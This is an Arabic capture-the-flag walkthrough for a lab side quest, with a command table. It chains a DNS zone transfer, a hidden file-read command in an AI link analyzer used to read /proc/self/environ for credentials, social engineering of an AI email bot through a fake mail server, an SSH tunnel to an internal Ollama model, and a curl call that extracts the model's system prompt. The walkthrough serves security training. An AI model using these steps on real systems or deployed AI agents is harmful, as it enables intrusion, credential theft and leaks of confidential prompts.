عن اللاب
Carrotbane of My Existence هو الـ Side Quest الثالث من Advent of Cyber 2025. Hopper بيحاول الوصول لـ Throne Room Security Server، ومحتاج توكن مسروق من AI اسمها HopAI Technologies بتاعة Sir Carrotbane. القصة كلها SSRF جوه أداة تحليل روابط بالـ AI، تسريب DNS، وهندسة اجتماعية على بوت AI بيرد على الإيميلات، وصولاً لموديل Ollama داخلي بيسرب الـ system prompt بتاعه.
اللاب مقفول لحد ما تزور MACHINE_IP:21337 وتدخل مفتاح Day 17 من Advent of Cyber. من غيره الـ nmap مش هيشوف حاجة.
مسار الحل التفصيلي
1
فتح القفل + DNS Zone Transfer
ادخل مفتاح Day 17 لفتح البورتات، بعدين dig axfr على hopaitech.thm بيسرب كل الـ subdomains الداخلية
dig axfr hopaitech.thm @IP
2
Flag 1 — SSRF/LFI في AI Analyzer
url-analyzer.hopaitech.thm فيه أمر مخفي FILE_READ — استخدمه لقراءة /proc/self/environ وطلعله بيانات دخول DNS Manager
FILE_READ /proc/self/environ
3
Flag 2 — Phishing عبر Violet
سجّل دخول لـ DNS Manager، اعمل MX record لدومين بتاعك، شغّل SMTP server وهمي، وابعت إيميلات للموظفين — موظفة اسمها violet.thumper هترد
aiosmtpd + swaks
4
Flag 3 — Ticketing System
سجّل دخول بالبيانات الجديدة، افتح التذاكر، هتلاقي تذكرة فيها مفتاح SSH خاص (ed25519) لمستخدم midnight.hop
5
Flag 4 — SSH Tunnel + Ollama Leak
اعمل local port forward لخدمة Ollama الداخلية، واستعلم عن موديل sir-carrotbane عشان يطلعلك الـ system prompt
ssh -L 11434:172.17.0.1:11434
مرجع الأوامر
| الأمر | الوصف |
|---|---|
| dig axfr hopaitech.thm @IP | تسريب كل الـ subdomains الداخلية |
| aiosmtpd -n -l 0.0.0.0:25 | تشغيل SMTP server وهمي لاستقبال الردود |
| swaks –to email –from you@dom –server hopaitech.thm | إرسال إيميلات لكل الموظفين |
| ssh -i ed25519 -N -L 11434:172.17.0.1:11434 midnight.hop@IP | عمل Tunnel لخدمة Ollama الداخلية |
| curl localhost:11434/api/show -d ‘{“name”:”sir-carrotbane”}’ | تسريب الـ system prompt + Flag 4 |
المهارات اللي هتكتسبها
DNS Zone Transfer Abuse
SSRF / LFI via AI Tooling
Email Social Engineering
SSH Port Forwarding
LLM System Prompt Extraction